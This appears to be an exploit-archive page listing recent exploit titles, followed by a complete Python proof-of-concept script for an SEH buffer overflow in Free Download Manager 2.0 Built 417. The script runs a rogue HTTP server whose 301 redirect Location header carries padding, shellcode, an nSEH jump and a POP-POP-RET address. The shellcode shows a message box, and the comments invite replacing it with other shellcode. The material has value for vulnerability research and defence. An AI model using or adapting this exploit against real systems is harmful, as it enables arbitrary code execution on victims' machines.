b1f00227f1
12 changes to exploits/shellcodes Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH) Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH) Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow Shopy Point of Sale v1.0 - CSV Injection Shopy Point of Sale 1.0 - CSV Injection Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC) Blog Master Pro v1.0 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection Blog Master Pro 1.0 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting GitList 0.6 - Unauthenticated Remote Code Execution TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot Frog CMS 0.9.5 - Persistent Cross-Site Scripting
56 lines
No EOL
2.4 KiB
Python
Executable file
56 lines
No EOL
2.4 KiB
Python
Executable file
# Exploit Title: Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)
|
|
# Date: 2018-04-23
|
|
# Exploit Author: Marwan Shamel
|
|
# Software Link: https://filehippo.com/download_free_download_manager/925/
|
|
# Version: v2.0 Built 417
|
|
# Tested on: Windows 7 Enterprise SP1 32 bit
|
|
# Special thanks to my wife
|
|
# Steps : file > Import > Import lists of downloads > open URL file that includes http://192.168.1.53:81 (HOST|Port changed according to your needs)
|
|
|
|
#!/usr/bin/python
|
|
|
|
from socket import *
|
|
from time import sleep
|
|
|
|
host = "192.168.1.53"
|
|
port = 81
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.bind((host, port))
|
|
s.listen(1)
|
|
print "\n[+] Listening on %d ..." % port
|
|
|
|
cl, addr = s.accept()
|
|
print "[+] Connection accepted from %s" % addr[0]
|
|
|
|
nseh = "\xeb\x88\x90\x90" #Short Jump backward 118bytes (jmp short 0xffffff8a) (more bytes can be jumped backwards depending on the shell code size required )
|
|
seh = "\xd1\x9c\x4a\x00" #address to trigger POP-POP-RETURN sequence
|
|
# Evil produce a message box 113 bytes can be changed according to your needs
|
|
evil = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"
|
|
payload = "\x43" * (1724-255) + "\x90" * 142 + evil + nseh + seh
|
|
|
|
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
|
|
buffer += "Date: Thu, 23 Feb 2018 10:21:08 GMT\r\n"
|
|
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
|
|
buffer += "Location: "+ payload + "\r\n"
|
|
buffer += "Vary: Accept-Encoding\r\n"
|
|
buffer += "Content-Length: 8000\r\n"
|
|
buffer += "Keep-Alive: timeout=5, max=100\r\n"
|
|
buffer += "Connection: Keep-Alive\r\n"
|
|
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
|
|
buffer += "\r\n"
|
|
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
|
|
buffer += "<html><head>\n"
|
|
buffer += "<title>301 Moved Permanently</title>\n"
|
|
buffer += "</head><body>\n"
|
|
buffer += "<h1>Moved Permanently</h1>\n"
|
|
buffer += "<p>The document has moved <ahref=\""+payload+"\">here</a>.</p>\n"
|
|
buffer += "</body></html>\n"
|
|
|
|
print cl.recv(1000)
|
|
cl.send(buffer)
|
|
print "[+] Sending buffer: OK\n"
|
|
|
|
sleep(1)
|
|
cl.close()
|
|
s.close() |